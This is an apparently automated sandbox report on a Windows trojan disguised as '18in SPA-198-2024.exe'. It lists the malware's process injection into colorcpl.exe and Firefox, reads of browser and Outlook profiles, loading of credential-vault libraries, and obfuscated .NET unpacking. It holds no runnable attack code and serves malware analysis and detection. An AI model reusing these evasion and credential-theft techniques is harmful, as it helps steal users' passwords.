Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05218DBF	7_2_05218DBF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051FADE0	7_2_051FADE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05200C00	7_2_05200C00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A0CB5	7_2_052A0CB5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051F0CF2	7_2_051F0CF2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05242F28	7_2_05242F28
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05220F30	7_2_05220F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2F30	7_2_052A2F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05274F40	7_2_05274F40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0527EFA0	7_2_0527EFA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0520CFE0	7_2_0520CFE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051F2FC8	7_2_051F2FC8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BEE26	7_2_052BEE26
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05200E59	7_2_05200E59
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05212E90	7_2_05212E90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BCE93	7_2_052BCE93
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BEEDB	7_2_052BEEDB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05216962	7_2_05216962
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052029A0	7_2_052029A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052CA9A6	7_2_052CA9A6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0520A840	7_2_0520A840
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05202840	7_2_05202840
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051E68B8	7_2_051E68B8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0522E8F0	7_2_0522E8F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BAB40	7_2_052BAB40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B6BD7	7_2_052B6BD7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051FEA80	7_2_051FEA80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B7571	7_2_052B7571
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0529D5B0	7_2_0529D5B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052C95C3	7_2_052C95C3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BF43F	7_2_052BF43F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051F1460	7_2_051F1460
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BF7B0	7_2_052BF7B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05245630	7_2_05245630
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B16CC	7_2_052B16CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052CB16B	7_2_052CB16B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0523516C	7_2_0523516C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051EF172	7_2_051EF172
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0520B1B0	7_2_0520B1B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B70E9	7_2_052B70E9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BF0E0	7_2_052BF0E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052070C0	7_2_052070C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052AF0CC	7_2_052AF0CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B132D	7_2_052B132D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051ED34C	7_2_051ED34C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0524739A	7_2_0524739A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052052A0	7_2_052052A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A12ED	7_2_052A12ED
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0521B2C0	7_2_0521B2C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B7D73	7_2_052B7D73
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05203D40	7_2_05203D40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B1D5A	7_2_052B1D5A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0521FDC0	7_2_0521FDC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05279C32	7_2_05279C32
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BFCF2	7_2_052BFCF2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BFF09	7_2_052BFF09
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BFFB1	7_2_052BFFB1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05201F92	7_2_05201F92
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05209EB0	7_2_05209EB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05295910	7_2_05295910
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05209950	7_2_05209950
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0521B950	7_2_0521B950
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0526D800	7_2_0526D800
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052038E0	7_2_052038E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BFB76	7_2_052BFB76
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0521FB80	7_2_0521FB80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05275BF0	7_2_05275BF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0523DBF9	7_2_0523DBF9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05273A6C	7_2_05273A6C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BFA49	7_2_052BFA49
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B7A46	7_2_052B7A46
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05245AA0	7_2_05245AA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0529DAAC	7_2_0529DAAC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A1AA3	7_2_052A1AA3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052ADAC6	7_2_052ADAC6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_03301B10	7_2_03301B10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_032FCA50	7_2_032FCA50
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_032FAEC8	7_2_032FAEC8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_032FCC70	7_2_032FCC70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_032FACF0	7_2_032FACF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_033033A0	7_2_033033A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_03305160	7_2_03305160
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0331B860	7_2_0331B860
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0551E75C	7_2_0551E75C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0551E3C6	7_2_0551E3C6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0551E2A4	7_2_0551E2A4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0551D828	7_2_0551D828

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: String function: 0129F290 appears 105 times
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: String function: 01267E54 appears 105 times
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: String function: 01255130 appears 58 times
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: String function: 0120B970 appears 280 times
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: String function: 0128EA12 appears 86 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 0526EA12 appears 86 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 0527F290 appears 105 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 051EB970 appears 280 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 05247E54 appears 111 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 05235130 appears 58 times

Source: 18in SPA-198-2024.exe, 00000000.00000002.2036780152.000000000067E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 18in SPA-198-2024.exe
Source: 18in SPA-198-2024.exe, 00000000.00000000.2009888899.0000000000152000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamegmsd.exe@ vs 18in SPA-198-2024.exe
Source: 18in SPA-198-2024.exe, 00000000.00000002.2042358078.0000000007450000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs 18in SPA-198-2024.exe
Source: 18in SPA-198-2024.exe, 00000004.00000002.2247875967.0000000000F38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecolorcpl.exej% vs 18in SPA-198-2024.exe
Source: 18in SPA-198-2024.exe, 00000004.00000002.2248135325.000000000130D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 18in SPA-198-2024.exe
Source: 18in SPA-198-2024.exe	Binary or memory string: OriginalFilenamegmsd.exe@ vs 18in SPA-198-2024.exe

Source: 18in SPA-198-2024.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 18in SPA-198-2024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, zLHKqjWatRJ6bmYn2g.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, zLHKqjWatRJ6bmYn2g.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, dWr9Yd1rel0FF9GRB2.cs	Security API names: _0020.SetAccessControl
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, dWr9Yd1rel0FF9GRB2.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, dWr9Yd1rel0FF9GRB2.cs	Security API names: _0020.AddAccessRule
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, dWr9Yd1rel0FF9GRB2.cs	Security API names: _0020.SetAccessControl
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, dWr9Yd1rel0FF9GRB2.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, dWr9Yd1rel0FF9GRB2.cs	Security API names: _0020.AddAccessRule
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, zLHKqjWatRJ6bmYn2g.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, dWr9Yd1rel0FF9GRB2.cs	Security API names: _0020.SetAccessControl
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, dWr9Yd1rel0FF9GRB2.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, dWr9Yd1rel0FF9GRB2.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/2@18/11

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\18in SPA-198-2024.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe

Mutant created: NULL

Source: C:\Windows\SysWOW64\colorcpl.exe

File created: C:\Users\user\AppData\Local\Temp\Ea64OHKq

Jump to behavior

Source: 18in SPA-198-2024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 18in SPA-198-2024.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: colorcpl.exe, 00000007.00000003.2435761387.0000000003473000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2433048032.0000000003426000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4471538704.0000000003447000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2435761387.0000000003447000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2435595771.0000000003450000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2433150619.0000000003447000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4471538704.0000000003473000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 18in SPA-198-2024.exe

ReversingLabs: Detection: 39%

Source: unknown	Process created: C:\Users\user\Desktop\18in SPA-198-2024.exe "C:\Users\user\Desktop\18in SPA-198-2024.exe"
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process created: C:\Users\user\Desktop\18in SPA-198-2024.exe "C:\Users\user\Desktop\18in SPA-198-2024.exe"
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process created: C:\Users\user\Desktop\18in SPA-198-2024.exe "C:\Users\user\Desktop\18in SPA-198-2024.exe"
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process created: C:\Users\user\Desktop\18in SPA-198-2024.exe "C:\Users\user\Desktop\18in SPA-198-2024.exe"	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process created: C:\Users\user\Desktop\18in SPA-198-2024.exe "C:\Users\user\Desktop\18in SPA-198-2024.exe"	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: colorui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: 18in SPA-198-2024.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 18in SPA-198-2024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: colorcpl.pdbGCTL source: 18in SPA-198-2024.exe, 00000004.00000002.2247875967.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, tWcBthnLrDi.exe, 00000005.00000002.4472197747.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: colorcpl.pdb source: 18in SPA-198-2024.exe, 00000004.00000002.2247875967.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, tWcBthnLrDi.exe, 00000005.00000002.4472197747.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tWcBthnLrDi.exe, 00000005.00000000.2159334939.0000000000E5E000.00000002.00000001.01000000.0000000C.sdmp, tWcBthnLrDi.exe, 00000008.00000000.2323289194.0000000000E5E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: 18in SPA-198-2024.exe, 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2251630098.0000000005017000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2249890288.0000000004E69000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 18in SPA-198-2024.exe, 18in SPA-198-2024.exe, 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2251630098.0000000005017000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2249890288.0000000004E69000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.18in SPA-198-2024.exe.35e5ad0.0.raw.unpack, XlF5VlCIHRSQX8M5eh.cs	.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, dWr9Yd1rel0FF9GRB2.cs	.Net Code: ec5Q35THmM System.Reflection.Assembly.Load(byte[])
Source: 0.2.18in SPA-198-2024.exe.35c5ab0.2.raw.unpack, XlF5VlCIHRSQX8M5eh.cs	.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, dWr9Yd1rel0FF9GRB2.cs	.Net Code: ec5Q35THmM System.Reflection.Assembly.Load(byte[])
Source: 0.2.18in SPA-198-2024.exe.4c50000.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs	.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, dWr9Yd1rel0FF9GRB2.cs	.Net Code: ec5Q35THmM System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_00406155 push ss; retf	4_2_00406160
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_00403270 push eax; ret	4_2_00403272
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0040227F pushad ; retf	4_2_00402280
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0040BB30 push eax; ret	4_2_0040BB31
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_00404DCD push ebx; iretd	4_2_00404DD8
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_004066BD push edx; iretd	4_2_004066BF
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_00413F7E pushad ; retf	4_2_00414025
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_00413FC5 pushad ; retf	4_2_00414025
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_011E225F pushad ; ret	4_2_011E27F9
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_011E27FA pushad ; ret	4_2_011E27F9
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012109AD push ecx; mov dword ptr [esp], ecx	4_2_012109B6
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_011E283D push eax; iretd	4_2_011E2858
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_011E1368 push eax; iretd	4_2_011E1369
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051C27FA pushad ; ret	7_2_051C27F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051C225F pushad ; ret	7_2_051C27F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051F09AD push ecx; mov dword ptr [esp], ecx	7_2_051F09B6
